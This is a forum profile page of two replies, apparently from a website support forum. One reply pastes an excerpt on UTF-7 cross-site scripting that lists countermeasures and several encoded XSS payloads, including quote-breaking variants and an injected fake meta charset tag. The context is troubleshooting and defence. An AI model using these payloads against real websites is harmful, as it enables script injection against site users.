xeagle

Forum Replies Created

Viewing 2 replies - 1 through 2 (of 2 total)
  • xeagle

    (@xeagleliveca)

    well not being an expert i am not sure but reading thru the post it may be a flaw in the header of your theme. but like I said i am not an expert.

    xeagle

    (@xeagleliveca)

    Hey guys i have been having this issue as well and, a few others, but i did a little research on “utf-7 injection” and got some interesting results.
    I changed the http just in case… so i will post contents so you do not have to click.
    this one shows very similar code to what we are seeing
    hxxp://openmya.hacker.jp/hasegawa/security/utf7cs.html

    I am far from an expert i thought this may help

    excerpt:

    #0 Countermeasures
    Countermeasures against XSS with UTF-7 are:

    Specify charset clearly (HTTP header is recommended)
    Don’t place the text attacker can control before <meta>
    Specify recognizable charset name by browser.

    For more information about UTF-7 trick, see “Cross-site scripthing with UTF-7”.
    #1 Most basic pattern

    +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-

    <script>alert(document.location)</script>

    Most basic XSS pattern with UTF-7.
    #2 URL encoded most basic pattern

    %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-

    <script>alert(document.location)</script>

    Expression which URL encoded the above.
    Example: https://example.com/search?q=%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
    #3 With quote

    +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-

    “><script>alert(document.location)</script><“

    #4 URL encoded, with quote

    %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-

    “><script>alert(document.location)</script><“

    Expression which URL encoded the above.
    Example: https://example.com/search?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
    #5 Inject fake <meta>

    +ADw-/title+AD4APA-meta http-equiv+AD0-‘content-type’ content+AD0-‘text/html+ADs-charset+AD0-utf-7’+AD4-

    </title><meta http-equiv=’content-type’ content=’text/html;charset=utf-7′>

    Inject fake <meta> before original <meta> and force recognize as UTF-7.
    <title>
    +ADw-/title+AD4APA-meta http-equiv+AD0-‘content-type’ content+AD0-‘text/html+ADs-charset+AD0-utf-7’+AD4-
    </title>
    <meta http-equiv=”content-type” content=”text/html; charset=utf-8″>

Viewing 2 replies - 1 through 2 (of 2 total)